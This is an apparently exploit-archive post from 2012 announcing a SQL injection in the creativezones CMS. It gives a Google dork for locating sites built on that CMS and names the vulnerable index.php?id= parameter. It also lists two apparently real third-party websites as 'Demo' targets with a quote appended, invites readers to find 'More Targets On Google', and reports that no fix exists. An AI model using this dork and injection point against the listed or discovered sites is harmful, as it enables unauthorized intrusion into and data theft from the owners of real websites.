creativezones cms sql injection

2012-07-04 22:03:30
Inviato da: Crim3R

# Exploit Title: creativezones cms sql injection

# Google Dork: intext:"Designed by creativezones.com" inurl:"index.php?id="

# Date: 07/04/2012

# Author: Crim3R

# software Link : http://www.creativezones.com/

# Version: All

# Tested on: all



========================================

there is an sql inejection vulnerability in index.php

http://127.0.0.1/creativezones/index.php?id= [sql injection]

========================================
Demo:

http://www.cifuk.org/index.php?id=dance.html'

http://www.pinnacleinteriors.co.uk/index.php?id=whoweare.html'

More Targets On Google :D

===============Crim3R=====================

sites :

http://irist.ir/forum/

http://security7.ir/sc/


thanks to : Amir - Skote_vahshat- 2MzRp - Mikili -

and all IrIsT & security7 Members ...

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.